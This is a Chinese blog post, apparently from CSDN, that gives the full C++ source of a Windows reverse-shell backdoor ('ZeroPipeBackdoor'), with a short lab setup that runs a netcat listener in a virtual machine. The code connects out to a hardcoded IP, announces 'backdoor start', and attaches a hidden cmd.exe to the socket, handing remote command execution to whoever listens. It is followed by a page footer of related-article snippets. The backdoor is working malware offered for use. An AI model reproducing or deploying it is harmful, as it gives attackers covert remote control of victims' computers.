零管道返回cmdshell

最新推荐文章于 2024-01-02 20:20:45 发布
最新推荐文章于 2024-01-02 20:20:45 发布
阅读量1.2w 收藏
点赞数
分类专栏: C/C++学习 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaocaiju/article/details/8264995
版权

零管道返回cmdshell


192.168.139.128
为虚拟机的IP地址。

实验步骤:

1 在虚拟机中开启nc -l -v -p 8888进行监听

2. 运行编译好的程序

虚拟机就会得到实体机的cmd了....


// ZeroPipeBackdoor.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib, "WS2_32.lib")	// 链接到WS2_32.lib

void cmdshell(SOCKET s)
{
	char szSysDir[MAX_PATH] = {0};
	GetSystemDirectory(szSysDir, MAX_PATH);
	strcat(szSysDir, "\\cmd.exe");

	STARTUPINFO si = {0};
	GetStartupInfo(&si);
	si.wShowWindow = SW_HIDE;
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;
	
	PROCESS_INFORMATION pi = {0};
	::CreateProcess(NULL, szSysDir, NULL, NULL, true, 0, NULL, NULL, &si, &pi );
	::WaitForSingleObject(pi.hProcess, INFINITE);

}


int main(int argc, char* argv[])
{
	char MyMessage[512] = {0};
	strcpy(MyMessage, "backdoor start");

	// 初始化WS2_32.dll
	WSADATA wsaData;
	
	WORD sockVersion = MAKEWORD(2, 2);
	if(::WSAStartup(sockVersion, &wsaData) != 0)
	{
		return -1;
	}
	SOCKET	s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
	if (s == INVALID_SOCKET)
	{
		return -1;
	}
	sockaddr_in sin;
	sin.sin_family = AF_INET;
	sin.sin_port = htons(8888);
	sin.sin_addr.S_un.S_addr = inet_addr("192.168.139.128");
	if ( connect(s, (sockaddr*)&sin, sizeof(sin)) == -1 )
	{
		int nErr = GetLastError();
		return -1;
	}
	if (send(s, MyMessage, sizeof(MyMessage), 0) == SOCKET_ERROR)
	{
		printf("send error");
		return -1;
	}
	cmdshell(s);
	printf("Hello World!\n");
	return 0;
}



小驹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux任何命令返回0,关于linux:如果任何命令返回值,则中止shell脚本?
weixin_32263417的博客
04-28 1533
我有一个bash shell脚本,它调用许多命令。如果任何命令返回值,我希望shell脚本自动退出,返回值为1。如果不显式检查每个命令的结果,是否可以这样做?例如dosomething1if [[ $? -ne 0 ]]; thenexit 1fidosomething2if [[ $? -ne 0 ]]; thenexit 1fi除set -e外,还包括set -u或set -eu。-u结束...
CMD调用并读取返回信息
03-10
当命令执行失败时,CMD返回一个非的退出状态码。在Python中,我们可以通过捕获`CalledProcessError`异常来处理这种情况: ```python try: result = subprocess.check_output("non_existent_command", shell...
DOSCommand Shell
11-28
运行DOS命令,让结果回显到其他控件如TMemo的UnitCmdShell单元
管道打开cmdshell
天元喜羊羊的博客
07-21 1065
源代码如下: #include #include #include #pragma comment(lib,"Ws2_32") #define SZBUFFER_SIZE 1024 #define LST_PORT 9090 SOCKET InitializeServer(VOID) { WORD version = MAKEWORD(2, 2); WSADATA wsaDat
一个简单的CMDSHELL后门
03-27 1193
一个简单的CMDSHELL后门文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的)信息来源: 邪恶八进制 中国   最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。  程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来
mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法
weixin_30299709的博客
09-20 1422
mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。 微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。 原因不说了,一般都是cmd.exe被限制权限了,system用户没有权限,解决方法2种: 1、替换shift文件(在开启...
Shell脚本学习笔记
最新发布
Miracle8070
01-02 1116
工作中,需要用到写一些shell脚本去完成一些简单的重复性工作, 于是就想系统的学习下shell脚本的相关知识, 本篇文章是学习shell脚本整理的学习笔记,内容参考主要来自C语言中文网, 学习过程中, 加入了一些在学习过程中的实践经验和思考, 并抽取出一些常用的知识内容整理成这篇文章,方便以后回看回练, 如果想更系统的学习, 可以去前面这个网站进行学习。大纲如下Shell基础Shell编程Shell高级Shell的一些快捷操作。
使用CreateProcess执行cmd,并通过匿名管道获取执行后的结果
explorer114的专栏
04-15 1万+
console执行命令的操作方式,即通过shell操作电脑的方式,在Linux下的方便快捷无需言说。同样,在Windows下的cmd是一个也是一个很有用的工具,有很多命令,通过console的cmd执行后,能够快速得出结果。在编程中,有很多应用软件或者服务软件需要执行一些windows常用的cmd作为软件辅助,不仅如此,执行有些cmd后还要得出相应的执行结果,以便于根据结果做相应逻辑调整;另一方面...
linux任何命令返回0,linux - 如果任何命令返回值,则中止shell脚本?
weixin_33608403的博客
04-28 1024
linux - 如果任何命令返回值,则中止shell脚本?我有一个调用许多命令的Bash shell脚本。如果任何命令返回值,我希望shell脚本自动退出,返回值为1。如果没有明确检查每个命令的结果,这可能吗?例如dosomething1if [[ $? -ne 0 ]]; thenexit 1fidosomething2if [[ $? -ne 0 ]]; thenexit 1fi9个...
python中执行shell的两种方法总结
12-23
例如,`commands.getstatusoutput(cmd_String)`函数会执行给定的Shell命令`cmd_String`,并返回一个包含命令执行状态和输出结果的元组。状态通常是退出代码,而输出是命令的标准输出。然而,需要注意的是,`commands...
举例讲解Linux系统下Python调用系统Shell的方法
09-21
`os.popen(cmd)`方法创建一个管道并执行命令,返回一个类文件对象,可以通过`read()`或`readlines()`来获取命令的输出。如果需要检查命令是否执行成功,可以检查返回值的整数部分是否为0。例如: ```python print(os...
Python下调用Linux的Shell命令的方法
09-20
`os.popen(cmd)`方法创建一个管道并执行命令,返回一个文件对象,可以通过读取该文件对象获取命令的输出。例如: ```python import os output = os.popen('ls -lt').read() print(output) ``` 2. `subprocess...
python调用shell脚本
04-04
`system()`函数会返回一个整数值,表示命令执行的状态码,0通常代表成功,非值表示有错误发生。 然而,`os.system()`方法并不总是最佳选择,因为它不支持命令的管道、重定向和输入/输出流的控制。这时,我们可以...
Windows常用shell命令
热门推荐
代码搬运工的博客
08-22 1万+
CMD 命令速查手册 ASSOC 显示或修改文件扩展名关联。 ATTRIB 显示或更改文件属性。 BREAK 设置或清除扩展式 CTRL+C 检查。 BOOTCFG 设置 boot.ini 文件的属性以便控制启动加载。 CACLS 显示或修改文件的访问控制列表(ACL)。 ...
c语言使用管道调用linux命令,C语言和Shell交互
weixin_36218360的博客
05-13 502
From:http://www.open-china.net/blog/96362.html1、system(执行shell命令)相关函数fork,execve,waitpid,popen头文件:stdlib.h函数原型:int system(const char * string);函数说明:system()会调用fork()产生子进程,由子进程来调用/bin/sh-c string来执行参数s...
cmdshell命令
09-19
cmdshell是一种命令行工具,它允许用户在Windows系统上执行命令和脚本。通过cmdshell,用户可以与操作系统进行交互,并执行各种任务,如文件操作、进程管理等。 以下是一些常用的cmdshell命令: 1. dir:显示当前目录中的文件和子目录列表。 2. cd:更改当前目录。 3. mkdir:创建一个新目录。 4. del:删除文件。 5. copy:复制文件。 6. ping:测试网络连接。 7. tasklist:显示当前正在运行的进程列表。 8. taskkill:终止正在运行的进程。 9. ipconfig:显示网络配置信息。 10. netstat:显示网络连接和统计信息。 这些只是cmdshell中的一小部分命令,还有很多其他命令可以用于执行不同的任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值